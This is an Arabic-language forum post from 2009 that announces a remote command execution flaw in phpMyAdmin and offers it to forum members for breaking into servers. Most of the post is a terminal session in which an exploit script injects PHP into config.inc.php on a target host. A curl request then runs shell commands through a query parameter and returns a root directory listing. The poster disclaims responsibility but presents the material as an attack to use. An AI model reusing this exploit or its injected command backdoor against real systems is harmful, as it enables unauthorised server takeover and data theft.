ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .
والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى سيكيول انجكشن ك ( xp_cmdshell - cmd - etc ) .
وطبعا حصريا لشباب منتدى سيكيورتي رولز وصلني البارحة من صديق عزيز ريموت كومند للثغره بحيث نقدر من خلال الشل كود هذا نقوم بإختراق السيرفر ( نبرء ذمتي وذمة الشباب من اي عملية اختراق عربية )
[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/ [+] checking if phpMyAdmin exists on URL provided ... [+] phpMyAdmin ****** and form token received successfully. Good! [+] attempting to inject phpinfo() ... [+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdmin-sec-r1z.sh.9217.phpinfo.r1z.html [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentestergmail.com
[b0x@r1z ~]curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 r1z
طبعا السكربت مو برمجتي وماله علاقه بمنتدانا ! فقط للتنويه
06-26-2009, 09:32 AM
phpMyAdmin ريموت كومند !! PoC 
المواضيع المتشابهه 
العرض العادي
